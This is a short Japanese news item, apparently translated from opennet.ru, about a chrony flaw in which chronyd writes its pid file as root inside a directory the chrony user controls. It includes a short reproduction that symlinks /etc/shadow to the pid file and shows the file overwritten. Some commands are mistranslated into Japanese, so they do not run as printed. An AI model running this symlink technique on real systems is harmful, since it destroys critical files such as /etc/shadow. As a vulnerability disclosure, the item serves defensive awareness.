В
この脆弱性は、chrony がまだ権限をリセットしておらず、root として実行されていた段階で作成された、安全でない pid ファイルの作成によって引き起こされます。 この場合、pid ファイルが書き込まれる /run/chrony ディレクトリは、systemd-tmpfiles 経由、または chronyd がユーザーおよびグループ「chrony」に関連付けられて起動されたときに、権限 0750 で作成されました。 したがって、ユーザー chrony にアクセスできる場合は、pid ファイル /run/chrony/chronyd.pid をシンボリック リンクに置き換えることができます。 シンボリック リンクは、chronyd の起動時に上書きされる任意のシステム ファイルをポイントできます。
root# systemctl chronyd.service を停止します
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ 終了
root# /usr/sbin/chronyd -n
^C
# /etc/shadow の内容の代わりに chronyd プロセス ID が保存されます
root# cat /etc/shadow
15287
脆弱性
SUSE と openSUSE の問題
出所: オープンネット.ru